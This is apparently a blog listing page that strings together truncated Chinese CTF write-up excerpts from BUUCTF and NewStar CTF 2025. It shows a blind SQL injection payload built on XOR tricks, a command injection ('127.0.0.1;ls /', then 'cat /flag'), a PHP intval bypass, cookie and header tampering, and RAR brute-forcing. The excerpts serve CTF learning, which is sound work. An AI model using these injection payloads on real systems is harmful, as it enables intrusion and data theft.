24kmagic

[极客大挑战 2019]FinalSQL1这里有2个异或，是为什么？ 如果只有一个异或： 1^1=0 0^1=1 就出现了问题：如果对的反而错误页面是错的，逻辑反面可以反着来思考，但是不完美 1?id=1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1 那两个异或解决了这个问题 121^1^1=11^0^1=0 123456789101112131415161718192021222324mport requests# 使用二分法url = ''flag = ''MaxLen = 250for i in range(1,MaxLen): # range(1, 11) 从 1 开始到 11,[1, 2, 3, 4, 5, 6, 7, 8, 9, 10] range(0, 30, 5) 步长为 5 [0, 5, 10, 15, 20, 25] low =...

rar1​ 这个是一个rar文件，里面好像隐藏着什么秘密，但是压缩包被加密了，毫无保留的告诉你，rar的密码是4位纯数字。 注意：得到的 flag 请包上 flag{} 提交 暴力破解即可

BUUCTF 来首歌吧1 摩斯密码 长：_ 短：. 空格 :空格 https://morsecodegenerator.org/zh/morse-audio-translator

[BJDCTF2020]藏藏藏 11.0110发现有pk压缩包，还有个docx 2.kali打开 2.1解析 1binwalk 图片.jpg //解析得到存在zip 2.2分离 1foremost 图片.jpg //分离得到图片中的压缩包，默认在output目录里面 2.3解压 1unzip ./output/zip/文件名.zip //得到 ：福利.docx 2.4查看 1cat 福利.docx //又发现pk文件头 2.5binwalk检测，发现很多压缩包 2.6foremost分离，此时加后缀-t，放在另一个output中 2.7tree ./新output 12345──(kali㉿kali)-[~/Desktop]└─$ tree ./output_Thu_Dec_18_08_56_09_2025/zip ./output_Thu_Dec_18_08_56_09_2025/zip└── 00000000.zip 2.8 解压unzip ./output_Thu_Dec_18_08_56_09_2025/zip/...

BUUCTF 爱因斯坦11.steglove发现 1......t. h.i.s._. i.s._.n. o.t._.p. a.s.s.w. o.r.d... 2.010发现pk压缩包 3.放kali里面 binwalk分析出压缩包 然后foremost分离 unzip解压 123456789101112131415161718192021222324┌──(kali㉿kali)-[~/Desktop]└─$ binwalk misc2.jpgDECIMAL HEXADECIMAL DESCRIPTION--------------------------------------------------------------------------------0 0x0 JPEG image data, JFIF standard 1.0130 0x1E TIFF image data, big-endian, offset of first image di...

[WUSTCTF2020]find_me1 图片属性有盲文 翻译以下就ok 1flag{y$0$u_f$1$n$d$_M$e$e$e$e$e}

NewStar CTF 2025 Week2 - Web DD 加速器知识点：命令行输入用；分割 127.0.0.1;ls / 1234567891011121314151617181920212223242526PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.034 ms--- 127.0.0.1 ping statistics ---1 packets transmitted, 1 received, 0% packet loss, time 0msrtt min/avg/max/mdev = 0.034/0.034/0.034/0.000 msbinbootdevetcflaghomeliblib64mediamntoptprocrootrunsbinsrvsystmpusrvar 试试cat /flag 1234567PING 127.0.0.1 (127.0.0.1) 56(84) bytes of d...

NewStar CTF 2025 Week1 - 宇宙的中心是 PHP s3kret.php 1234567891011 <?phphighlight_file(__FILE__);include "flag.php";if(isset($_POST['newstar2025'])){ $answer = $_POST['newstar2025']; if(intval($answer)!=47&&intval($answer,0)==47){ echo $flag; }else{ echo "你还未参透奥秘"; }} 重点： 1intval($answer)!=47&&intval($answer,0)==47 ->了解intval PHP 中，intval($value, $base) 如果 $base 是 0，PHP 会根据 $va...

NewStar CTF 2025 Week1 - Web 黑客小 W 的故事（1）抓包看到 修改请求头 继续修改拿到第二关地址 注意得用get方法 如果还是进不去去控制台传入cookie，我之前直接改会重定向 1document.cookie = "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJOYW1lIjoiVHJ1ZSIsImxldmVsIjoyfQ.KMoDTrhIPWahIY_BPx0OI_KcqDbeeEqBvniVkbmyFAA; path=/"; “ 这样吧，你用 DELETE 的方法把我身上的虫子(chongzi)都弄掉，我就把骨钉给你 ” 输入guding 拿到cookie 每次给你新cookie了记得下一个地址要拿去用 又遇见重定向了 你可以在网络里面找到下一关入口的，一般来说双击就进去了 /Level3_SheoChallenge 结合前面他说身份信息ua，我们修改一下就行，记得别忘记版本号，表示这个技能的牛逼程度 如果改的版本号比较低，它会提示你太慢...

NewStar CTF 2025 Week1 - Web 我真得控制你了就算禁用我们还是可以打开看码的 火狐： 右上角三个横线->更多工具->web开发者工具 那么就算我们禁用了js，也同时禁用了按钮，所以不如直接绕过： 因为看到了 1234<form id="nextLevelForm" method="POST" action="next-level.php"> <input type="hidden" name="access" value="1"> <input type="hidden" name="csrf_token" value="c79b33582967a0c72527f8d08071e37802377527cd050bebf60bc4d5ccb2426d"> </form...